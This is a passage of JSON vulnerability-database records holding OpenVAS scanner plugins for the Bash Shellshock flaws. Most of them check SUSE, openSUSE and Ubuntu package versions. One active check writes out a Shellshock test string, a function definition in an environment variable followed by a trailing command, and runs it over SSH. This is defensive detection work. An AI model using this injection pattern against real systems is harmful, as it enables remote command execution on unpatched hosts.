"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850615", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright 
(C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850615\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:25 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1229-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to 
variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 12.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1229-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~61.15.1\", rls:\"openSUSE12.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "description": "This host is installed with GNU Bash Shell\n and is 
prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6271"], "modified": "2018-11-27T00:00:00", "id": "OPENVAS:1361412562310802085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bash_shellshock_credential_cmd_exec_vuln_03.nasl 12551 2018-11-27 14:35:38Z cfischer $\n#\n# GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:gnu:bash\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802085\");\n script_version(\"$Revision: 12551 $\");\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-27 15:35:38 +0100 (Tue, 27 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 15:52:31 +0530 (Wed, 01 Oct 2014)\");\n script_name(\"GNU Bash Environment Variable Handling Shell RCE Vulnerability (LSC) - 03\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_gnu_bash_detect_lin.nasl\");\n script_mandatory_keys(\"bash/linux/detected\");\n script_exclude_keys(\"ssh/force/pty\");\n\n script_xref(name:\"URL\", value:\"https://ftp.gnu.org/gnu/bash/\");\n script_xref(name:\"URL\", value:\"https://shellshocker.net/\");\n script_xref(name:\"URL\", value:\"http://lcamtuf.blogspot.in/2014/09/bash-bug-apply-unofficial-patch-now.html\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Login to the target machine with ssh\n credentials and check its possible to execute the commands via GNU bash shell.\");\n\n script_tag(name:\"insight\", value:\"GNU bash contains a flaw that is triggered\n when evaluating environment variables passed from another environment.\n After processing a 
function definition, bash continues to process trailing\n strings. Incomplete fix to CVE-2014-7169, CVE-2014-6271, and CVE-2014-6277\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n or local attackers to inject shell commands, allowing local privilege\n escalation or remote command execution depending on the application vector.\");\n\n script_tag(name:\"affected\", value:\"GNU Bash through 4.3 bash43-026\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"ssh/force/pty\" ) ) exit( 0 );\n\nif( isnull( port = get_app_port( cpe:CPE, service:\"ssh-login\" ) ) ) exit( 0 );\nif( ! bin = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # Returns e.g. \"/bin/bash\" or \"unknown\" (if the location of the binary wasn't detected).\n\nsock = ssh_login_or_reuse_connection();\nif( ! 
sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { echo vulnerable; }' /bin/bash -c vt_test\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { echo CVE-2014-6278 vulnerable; }' \" + bash_cmd + \" -c vt_test\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of '='\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6278 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-13T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850778", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850778\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents 
could lead to a crash of bash.\n\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5\", rpm:\"libreadline5~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-32bit\", rpm:\"libreadline5-32bit~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-x86\", rpm:\"bash-x86~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-x86\", rpm:\"libreadline5-x86~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents 
could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259-1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n 
security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841986", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841986\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:26 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-2\");\n script_tag(name:\"insight\", value:\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch\nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. 
(CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-2/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for 
bash USN-2363-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841987\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:38 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-1\");\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. 
(CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 